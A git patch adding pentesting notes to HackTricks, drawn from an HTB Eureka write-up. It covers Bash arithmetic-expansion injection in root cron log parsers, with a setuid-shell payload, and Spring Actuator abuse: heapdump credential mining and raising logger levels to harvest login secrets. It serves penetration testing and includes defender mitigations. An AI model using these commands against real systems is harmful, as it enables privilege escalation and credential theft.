From 0d245aa5946eebf180532bbce9846337780b6601 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Sat, 30 Aug 2025 18:32:29 +0000 Subject: [PATCH] Add content from: HTB Eureka: From Actuator HeapDump to SSH, credential captur... - Remove searchindex.js (auto-generated file) --- .../privilege-escalation/README.md | 37 ++++++++- .../pentesting-web/spring-actuators.md | 78 ++++++++++++++++++- 2 files changed, 113 insertions(+), 2 deletions(-) diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md index 6c419ccb0..852a7619b 100644 --- a/src/linux-hardening/privilege-escalation/README.md +++ b/src/linux-hardening/privilege-escalation/README.md @@ -416,6 +416,40 @@ Read the following page for more wildcard exploitation tricks: wildcards-spare-tricks.md {{#endref}} + +### Bash arithmetic expansion injection in cron log parsers + +Bash performs parameter expansion and command substitution before arithmetic evaluation in ((...)), $((...)) and let. If a root cron/parser reads untrusted log fields and feeds them into an arithmetic context, an attacker can inject a command substitution $(...) that executes as root when the cron runs. + +- Why it works: In Bash, expansions occur in this order: parameter/variable expansion, command substitution, arithmetic expansion, then word splitting and pathname expansion. So a value like `$(/bin/bash -c 'id > /tmp/pwn')0` is first substituted (running the command), then the remaining numeric `0` is used for the arithmetic so the script continues without errors. + +- Typical vulnerable pattern: + ```bash + #!/bin/bash + # Example: parse a log and "sum" a count field coming from the log + while IFS=',' read -r ts user count rest; do + # count is untrusted if the log is attacker-controlled + (( total += count )) # or: let "n=$count" + done < /var/www/app/log/application.log + ``` + +- Exploitation: Get attacker-controlled text written into the parsed log so that the numeric-looking field contains a command substitution and ends with a digit. Ensure your command does not print to stdout (or redirect it) so the arithmetic remains valid. + ```bash + # Injected field value inside the log (e.g., via a crafted HTTP request that the app logs verbatim): + $(/bin/bash -c 'cp /bin/bash /tmp/sh; chmod +s /tmp/sh')0 + # When the root cron parser evaluates (( total += count )), your command runs as root. + ``` + +- Preconditions: + - You can cause a line you control to be written into the log consumed by the root script. + - The script evaluates an untrusted variable inside ((...)), $((...)) or let. + +- Mitigations (for defenders): + - Never use arithmetic evaluation on untrusted strings. Validate first: `[[ $count =~ ^[0-9]+$ ]] || continue`. + - Prefer integer-safe parsing with awk or mapfile and explicit regex checks. + - Run log parsers as least-privileged users; never as root unless strictly necessary. + + ### Cron script overwriting and symlink If you **can modify a cron script** executed by root, you can get a shell very easily: @@ -1682,6 +1716,7 @@ android-rooting-frameworks-manager-auth-bypass-syscall-hook.md - [https://linuxconfig.org/how-to-manage-acls-on-linux](https://linuxconfig.org/how-to-manage-acls-on-linux) - [https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure\&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) - [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/) - +- [0xdf – HTB Eureka (bash arithmetic injection via logs, overall chain)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html) +- [GNU Bash Reference Manual – Shell Arithmetic](https://www.gnu.org/software/bash/manual/bash.html#Shell-Arithmetic) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/pentesting-web/spring-actuators.md b/src/network-services-pentesting/pentesting-web/spring-actuators.md index 1c02371ee..5a59413b6 100644 --- a/src/network-services-pentesting/pentesting-web/spring-actuators.md +++ b/src/network-services-pentesting/pentesting-web/spring-actuators.md @@ -68,4 +68,80 @@ Connection: close -{{#include ../../banners/hacktricks-training.md}} +## HeapDump secrets mining (credentials, tokens, internal URLs) + +If `/actuator/heapdump` is exposed, you can usually retrieve a full JVM heap snapshot that frequently contains live secrets (DB creds, API keys, Basic-Auth, internal service URLs, Spring property maps, etc.). + +- Download and quick triage: + ```bash + wget http://target/actuator/heapdump -O heapdump + # Quick wins: look for HTTP auth and JDBC + strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client' + # Decode any Basic credentials you find + printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d + ``` + +- Deeper analysis with VisualVM and OQL: + - Open heapdump in VisualVM, inspect instances of `java.lang.String` or run OQL to hunt secrets: + ``` + select s.toString() + from java.lang.String s + where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString()) + ``` + +- Automated extraction with JDumpSpider: + ```bash + java -jar JDumpSpider-*.jar heapdump + ``` + Typical high-value findings: + - Spring `DataSourceProperties` / `HikariDataSource` objects exposing `url`, `username`, `password`. + - `OriginTrackedMapPropertySource` entries revealing `management.endpoints.web.exposure.include`, service ports, and embedded Basic-Auth in URLs (e.g., Eureka `defaultZone`). + - Plain HTTP request/response fragments including `Authorization: Basic ...` captured in memory. + +Tips: +- Use a Spring-focused wordlist to discover actuator endpoints quickly (e.g., SecLists spring-boot.txt) and always check if `/actuator/logfile`, `/actuator/httpexchanges`, `/actuator/env`, and `/actuator/configprops` are also exposed. +- Credentials from heapdump often work for adjacent services and sometimes for system users (SSH), so try them broadly. + + +## Abusing Actuator loggers/logging to capture credentials + +If `management.endpoints.web.exposure.include` allows it and `/actuator/loggers` is exposed, you can dynamically increase log levels to DEBUG/TRACE for packages that handle authentication and request processing. Combined with readable logs (via `/actuator/logfile` or known log paths), this can leak credentials submitted during login flows (e.g., Basic-Auth headers or form parameters). + +- Enumerate and crank up sensitive loggers: + ```bash + # List available loggers + curl -s http://target/actuator/loggers | jq . + + # Enable very verbose logs for security/web stacks (adjust as needed) + curl -s -X POST http://target/actuator/loggers/org.springframework.security \ + -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}' + curl -s -X POST http://target/actuator/loggers/org.springframework.web \ + -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}' + curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \ + -H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}' + ``` + +- Find where logs are written and harvest: + ```bash + # If exposed, read from Actuator directly + curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password=' + + # Otherwise, query env/config to locate file path + curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))' + ``` + +- Trigger login/authentication traffic and parse the log for creds. In microservice setups with a gateway fronting auth, enabling TRACE for gateway/security packages often makes headers and form bodies visible. Some environments even generate synthetic login traffic periodically, making harvesting trivial once logging is verbose. + +Notes: +- Reset log levels when done: `POST /actuator/loggers/` with `{ "configuredLevel": null }`. +- If `/actuator/httpexchanges` is exposed, it can also surface recent request metadata that may include sensitive headers. + + +## References + +- [Exploring Spring Boot Actuator Misconfigurations (Wiz)](https://www.wiz.io/blog/spring-boot-actuator-misconfigurations) +- [VisualVM](https://visualvm.github.io/) +- [JDumpSpider](https://github.com/whwlsfb/JDumpSpider) +- [0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)](https://0xdf.gitlab.io/2025/08/30/htb-eureka.html) + +{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file